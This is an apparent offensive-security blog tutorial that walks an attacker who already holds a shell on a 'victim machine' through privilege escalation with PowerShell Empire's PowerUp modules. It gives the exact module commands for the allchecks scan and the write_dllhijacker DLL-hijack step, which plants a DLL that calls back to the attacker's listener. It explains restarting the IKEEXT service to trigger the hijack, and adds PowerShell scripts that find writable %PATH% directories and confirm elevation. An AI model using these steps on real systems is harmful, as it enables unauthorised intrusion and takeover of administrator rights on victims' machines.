So, one way or another, you have a shell on the victim machine. Well done. A quick ‘sysinfo’ shows that you are not running as an administrator, so the modules you can use are limited to basic operations. To reach sensitive data and operations you must escalate to an administrator account. But how do you do it?
PowerShell Empire is here to help. It ships a wide range of privilege escalation modules, from mimikatz to PowerUp. PowerUp looks for misconfigurations (writable service binaries, unquoted service paths, hijackable DLL search paths and the like) rather than missing patches, so it can work even on a system with the newest patches installed. Other modules, such as sherlock, instead look for known Windows privilege escalation vulnerabilities that the target has not been patched against.
In this article, we will assume that you already have a working PowerShell Empire agent on the victim machine running as a non-administrator account (see our previous article for how to obtain the shell).
Okay, enough theory, let’s get started. Interact with your existing agent:
interact <agent name>
For this article we will be using the PowerUp modules, which in our experience have the highest success rate of all the privilege escalation modules in PowerShell Empire, precisely because they depend on misconfigurations rather than on the target’s patch level.
Typing usemodule privesc/powerup/ and pressing Tab lists PowerShell Empire’s PowerUp privilege escalation modules. The last one, named ‘allchecks’, might catch your eye – and it should. This module runs every PowerUp privilege escalation check on the target machine in one go. Select it with usemodule privesc/powerup/allchecks, then check with info whether it requires any additional configuration. As you will see, it needs none: the module is ready to use as is. Run it with execute.
When it finishes, the output lists the results of every PowerUp check. Each finding that can be abused comes with an AbuseFunction line naming the PowerUp function that exploits it. In our run we got a potentially hijackable DLL path, which is the most common finding in our experience.
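To see what sits behind that finding, here is an added example of the core of PowerUp’s hijackable-DLL check, written for this article and not taken from PowerUp or Empire. PowerUp’s Find-PathDLLHijack looks for directories on %PATH% that the current (non-admin) user can write to; a DLL that a privileged process loads by bare name and cannot find in its own directory or in System32 is resolved through %PATH%, so a DLL planted in such a directory runs inside that process. The function name Find-WritablePathDir is our own.

```powershell
# Added example (not PowerUp's or Empire's own code): reproduce the core of the
# 'hijackable DLL' finding by listing %PATH% directories the current user can
# write to. Function name is hypothetical.
function Find-WritablePathDir {
    [CmdletBinding()]
    param()

    # Split %PATH%, drop empty entries and duplicates, keep only existing
    # directories. The @() keeps $dirs an array even if one entry survives.
    $dirs = @($env:PATH -split ';' |
        ForEach-Object { $_.Trim() } |
        Where-Object { $_ -and (Test-Path -LiteralPath $_ -PathType Container) } |
        Select-Object -Unique)

    for ($i = 0; $i -lt $dirs.Count; $i++) {
        $dir = $dirs[$i]
        # Probe by creating and deleting a file rather than parsing the ACL:
        # a real write attempt reflects inherited and group-derived rights too.
        $probe = Join-Path $dir ([IO.Path]::GetRandomFileName())
        try {
            [IO.File]::WriteAllText($probe, '')
            Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
            [PSCustomObject]@{
                Directory = $dir
                # The loader walks %PATH% left to right, so a lower index
                # beats any later directory that holds a same-named DLL.
                PathIndex = $i
            }
        } catch {
            # Access denied (or read-only media): not writable, skip it.
        }
    }
}

# Run the check and show any writable %PATH% directories.
Find-WritablePathDir | Format-Table -AutoSize
```

A hit here is only half the story: the DLL name you drop must be one that a privileged process actually asks for and does not already find earlier in its search order, which is why PowerUp pairs the directory with a specific AbuseFunction rather than just reporting the directory.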
Now, how do we exploit it? The answer is very easy. For each AbuseFunction there is a separate PowerShell Empire privilege escalation module. Let’s find the one we need by searching for the keyword DLL with searchmodule dll. One of the results is write_dllhijacker, which sounds just like what we need. Select it with usemodule privesc/powerup/write_dllhijacker and run info to see which options are required.
As we can see, we need to set DllPath (copy the path that the AbuseFunction line in the allchecks output gave us) and Listener (in your case it will probably be ‘http’), and then we can run the module. Let’s set these options and run it:
set DllPath <your DLL path>
set Listener http
execute
Now wait for the callback. The planted DLL only runs when the privileged process that searches for it starts, so if no new agent checks in right away, that service has to be (re)started or the machine rebooted; PowerUp’s Write-HijackDll is built around the wlbsctrl.dll hijack of the IKEEXT service, so restarting IKEEXT is the usual trigger. Once the new agent appears, you have a PowerShell Empire session running in an elevated context. If you found that useful, please leave a comment or consider sharing this post. Good luck and happy hacking!
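Before relying on the new session, confirm it really is elevated. The following check is an added example written for this article, not part of Empire; it can be run from the new agent (its shell is PowerShell) or from any PowerShell prompt on the host. The function name Test-Elevated is our own.

```powershell
# Added example (not Empire's own code): confirm the new callback is elevated
# before using it. Function name is hypothetical.
function Test-Elevated {
    $id        = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($id)

    # 'whoami /groups' prints the process integrity label. High or System
    # means the hijacked DLL was loaded by a privileged process; Medium means
    # you are still where you started.
    $match = whoami /groups | Select-String 'Mandatory Label' | Select-Object -First 1
    $label = if ($match) { ($match.Line.Trim() -replace '\s{2,}', ' ') } else { 'unknown' }

    [PSCustomObject]@{
        User      = $id.Name
        IsSystem  = $id.IsSystem
        # Only true for a process that holds the Administrators group enabled,
        # i.e. a high-integrity token, not merely an admin account under UAC.
        IsAdmin   = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
        Integrity = $label
    }
}

Test-Elevated
```

If IsAdmin comes back false and the label still reads Medium, the DLL has not been loaded yet (see the note about restarting the vulnerable service above) or the process that loaded it was not the privileged one you expected.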